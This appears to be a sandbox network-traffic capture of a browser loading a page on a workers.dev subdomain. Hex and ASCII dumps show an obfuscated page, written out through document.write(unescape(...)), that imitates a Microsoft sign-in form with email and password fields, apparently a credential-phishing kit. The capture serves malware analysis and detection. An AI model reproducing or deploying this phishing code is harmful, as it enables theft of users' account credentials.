2024-04-28 23:11:42 UTC	358	IN	Data Raw: 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: %20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49767	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:55 UTC	740	OUT	GET / HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:55 UTC	575	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:55 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sog54Exv83YTyC7ay56BE%2Bt11hG%2FQh3yhJplUfkCG3hZdqfDiNPaNH7XHOjPmUzN%2FgO9uB9sSYv0x7WnaDrwxk1XyfWs3gaYQsidCk36T2QKd50UzWFwYZb2Z3w80cw7L2QZ2vr%2BgV62%2Bpld6hGbOPoSD4ralg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babbf3e8f986da-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:55 UTC	794	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:55 UTC	1369	IN	Data Raw: 72 64 65 72 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 Data Ascii: rder-bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3
2024-04-28 23:11:55 UTC	1369	IN	Data Raw: 30 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 Data Ascii: 0%20%20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%
2024-04-28 23:11:55 UTC	1369	IN	Data Raw: 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 Data Ascii: _logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESi
2024-04-28 23:11:55 UTC	1369	IN	Data Raw: 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 Data Ascii: n%20type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%
2024-04-28 23:11:55 UTC	1369	IN	Data Raw: 25 32 38 25 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e Data Ascii: %28%27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.
2024-04-28 23:11:55 UTC	1369	IN	Data Raw: 32 30 25 32 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 Data Ascii: 20%20pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%
2024-04-28 23:11:55 UTC	362	IN	Data Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 Data Ascii: 0%20%20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49768	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:56 UTC	578	OUT	GET /style.css HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:56 UTC	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:56 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M2V%2FbrUEXLbAR3qxlYi6nV8UXMix%2BIa%2FyHaXlY0AoBbWLS20OJ4LBpaJNqFRflNPlZ7jn%2F6oaH7KHSx%2Bl%2BFHm%2FaT6F3H2DIFLWe06dYJuZOvFY4Qs3PbBr2V5pyHtNCKw5QORfKc1jZsMdloiCBvao3R%2B4n6lA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babbfc3b5286d8-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:56 UTC	788	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:56 UTC	1369	IN	Data Raw: 30 25 32 30 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 Data Ascii: 0%20border-bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20ma
2024-04-28 23:11:56 UTC	1369	IN	Data Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 Data Ascii: 0%20%20%20%20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%20
2024-04-28 23:11:56 UTC	1369	IN	Data Raw: 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 Data Ascii: rosoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%2
2024-04-28 23:11:56 UTC	1369	IN	Data Raw: 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 Data Ascii: Cbutton%20type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%
2024-04-28 23:11:56 UTC	1369	IN	Data Raw: 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 Data Ascii: lector%28%27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%
2024-04-28 23:11:56 UTC	1369	IN	Data Raw: 32 30 25 32 30 25 32 30 25 32 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 Data Ascii: 20%20%20%20pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%
2024-04-28 23:11:56 UTC	368	IN	Data Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 Data Ascii: 0%20%20%20%20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49769	104.21.235.181	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:57 UTC	641	OUT	GET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1 Host: www.linkpicture.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
